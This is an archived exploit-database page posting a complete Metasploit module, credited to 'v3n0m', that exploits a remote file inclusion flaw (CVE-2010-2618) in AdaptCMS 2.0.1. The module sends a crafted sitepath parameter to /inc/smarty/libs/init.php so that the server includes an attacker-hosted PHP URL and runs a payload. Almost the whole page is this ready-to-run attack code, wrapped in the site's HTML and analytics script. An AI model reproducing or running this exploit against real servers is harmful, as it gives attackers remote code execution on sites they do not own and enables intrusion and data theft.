[webapps / 0day] - AdaptCMS 2.0.1 Beta Release Remote File I
Posted on 12 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf) by v3n0m in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================================================== AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf) ===================================================================== ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit', 'Description' => %q{ This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php. }, 'Author' => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ], 'License' => MSF_LICENSE, 'Version' => '$Revision:$', 'References' => [ [ 'CVE', '2010-2618' ], [ 'BID', '41116' ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, 'Space' => 262144, # 256k }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Oct 12 2010', 'DefaultTarget' => 0)) register_options([ OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']), ], self.class) end def php_exploit timeout = 0.01 uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) print_status("Trying uri #{uri}") response = send_request_raw( { 'global' => true, 'uri' => uri, },timeout) if response and response.code != 200 print_error("Server returned non-200 status code (#{response.code})") end handler end end # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-12]</pre></body></html>
